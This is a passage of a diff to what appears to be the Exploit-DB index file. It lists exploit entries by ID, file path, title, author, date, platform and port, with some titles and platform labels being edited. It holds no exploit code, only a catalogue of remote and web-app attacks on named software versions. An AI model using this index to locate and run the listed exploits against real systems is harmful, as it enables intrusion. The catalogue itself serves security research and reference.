135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
@ -8979,7 +8981,7 @@ id,file,description,date,author,platform,type,port
581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25
583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
584,platforms/windows/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
584,platforms/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,win_x86,remote,0
588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0
590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000
@ -9030,7 +9032,7 @@ id,file,description,date,author,platform,type,port
758,platforms/osx/remote/758.c,"Apple iTunes - Playlist Local Parsing Buffer Overflow",2005-01-16,nemo,osx,remote,0
759,platforms/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode Exploit",2005-01-16,ATmaCA,windows,remote,0
761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162
764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
764,platforms/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,unix,remote,80
765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21
771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0
@ -9156,7 +9158,7 @@ id,file,description,date,author,platform,type,port
1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515
1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105
1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722
1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",windows,remote,13722
1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",win_x86,remote,13722
1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722
1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0
1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0
@ -9429,7 +9431,7 @@ id,file,description,date,author,platform,type,port
3661,platforms/windows/remote/3661.pl,"HP Mercury Quality Center - Spider90.ocx ProgColor Overflow",2007-04-04,ri0t,windows,remote,0
3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0
3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21
3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80
3680,platforms/win_x86/remote/3680.sh,"Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,win_x86,remote,80
3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0
3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0
3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0
@ -9444,7 +9446,7 @@ id,file,description,date,author,platform,type,port
3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow",2007-04-27,"Umesh Wanve",windows,remote,0
3815,platforms/linux/remote/3815.c,"Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield)",2007-04-29,Xpl017Elz,linux,remote,0
3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g (Linux) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,linux,remote,0
3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,windows,remote,0
3822,platforms/win_x86/remote/3822.c,"3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow",2007-04-30,vade79,win_x86,remote,0
3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0
3844,platforms/windows/remote/3844.html,"ActSoft DVD-Tools - 'dvdtools.ocx 3.8.5.0' Stack Overflow",2007-05-04,shinnai,windows,remote,0
3872,platforms/windows/remote/3872.html,"Taltech Tal Bar Code - ActiveX Control Buffer Overflow",2007-05-08,"Umesh Wanve",windows,remote,0
@ -9473,7 +9475,7 @@ id,file,description,date,author,platform,type,port
3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow",2007-05-24,rgod,windows,remote,0
3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow",2007-05-25,rgod,windows,remote,0
3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,windows,remote,0
3996,platforms/windows/remote/3996.c,"Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80
3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80
4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0
4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0
4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote Overwrite (SEH)",2007-05-30,h07,windows,remote,0
@ -9509,7 +9511,7 @@ id,file,description,date,author,platform,type,port
4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999
4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote,0
4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote,0
4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80
4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit",2007-07-08,Xpl017Elz,linux,remote,80
4170,platforms/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0
4176,platforms/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write Exploit",2007-07-12,callAX,windows,remote,0
4177,platforms/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0
@ -9620,7 +9622,7 @@ id,file,description,date,author,platform,type,port
4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065)",2007-12-18,axis,windows,remote,0
4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0
4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0
4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128
4754,platforms/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",win_x86,remote,3128
4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25
4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80
@ -9671,7 +9673,7 @@ id,file,description,date,author,platform,type,port
5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow",2008-02-03,Elazar,windows,remote,0
5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow",2008-02-06,securfrog,windows,remote,0
5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0
5079,platforms/windows/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,windows,remote,515
5079,platforms/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515
5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0
5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0
5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0
@ -9703,12 +9705,12 @@ id,file,description,date,author,platform,type,port
5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0
5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69
5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69
5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80
5330,platforms/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80
5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0
5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0
5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0
@ -9754,7 +9756,7 @@ id,file,description,date,author,platform,type,port
6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80
6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0
6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0
6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0
@ -10127,7 +10129,7 @@ id,file,description,date,author,platform,type,port
9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80
33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0
9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0
9993,platforms/multiple/remote/9993.txt,"Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
9993,platforms/multiple/remote/9993.txt,"Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0
9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0
9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
@ -10222,7 +10224,7 @@ id,file,description,date,author,platform,type,port
11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0
11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0
11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0
11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
@ -11169,7 +11171,7 @@ id,file,description,date,author,platform,type,port
17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0
17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0
17969,platforms/multiple/remote/17969.py,"Apache (mod_proxy) - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
@ -12317,7 +12319,7 @@ id,file,description,date,author,platform,type,port
21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0
21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit",2002-07-30,spabam,unix,remote,80
40347,platforms/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0
@ -13913,7 +13915,7 @@ id,file,description,date,author,platform,type,port
31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0
31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0
31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0
31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
@ -14731,7 +14733,7 @@ id,file,description,date,author,platform,type,port
36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0
36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36352,platforms/linux/remote/36352.txt,"Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
36352,platforms/linux/remote/36352.txt,"Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0
36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote,0
36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0
@ -14774,7 +14776,7 @@ id,file,description,date,author,platform,type,port
36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0
36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667
36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,jsp,remote,8080
36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0
36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0
@ -15063,7 +15065,7 @@ id,file,description,date,author,platform,type,port
39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0
39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0
39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0
39196,platforms/linux/remote/39196.py,"Apache (mod_wsgi) - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
39196,platforms/linux/remote/39196.py,"Apache mod_wsgi - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0
39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0
39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0
39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21
@ -16057,7 +16059,7 @@ id,file,description,date,author,platform,type,port
1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0
1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0
1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0
1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0
1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0
1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0
1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0
1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0
@ -17056,7 +17058,7 @@ id,file,description,date,author,platform,type,port
2862,platforms/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0
2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0
2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - 'import-mt.php' Remote File Inclusion",2006-11-29,tarkus,php,webapps,0
2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution",2006-11-30,rgod,php,webapps,0
2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
2871,platforms/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0
2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0
@ -22479,7 +22481,7 @@ id,file,description,date,author,platform,type,port
11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0
11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0
11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0
11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
11442,platforms/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0
11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0
11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0
@ -37102,7 +37104,7 @@ id,file,description,date,author,platform,type,port
41155,platforms/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",php,webapps,0
41156,platforms/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",php,webapps,0
41157,platforms/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",php,webapps,0
41159,platforms/php/webapps/41159.txt,"Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
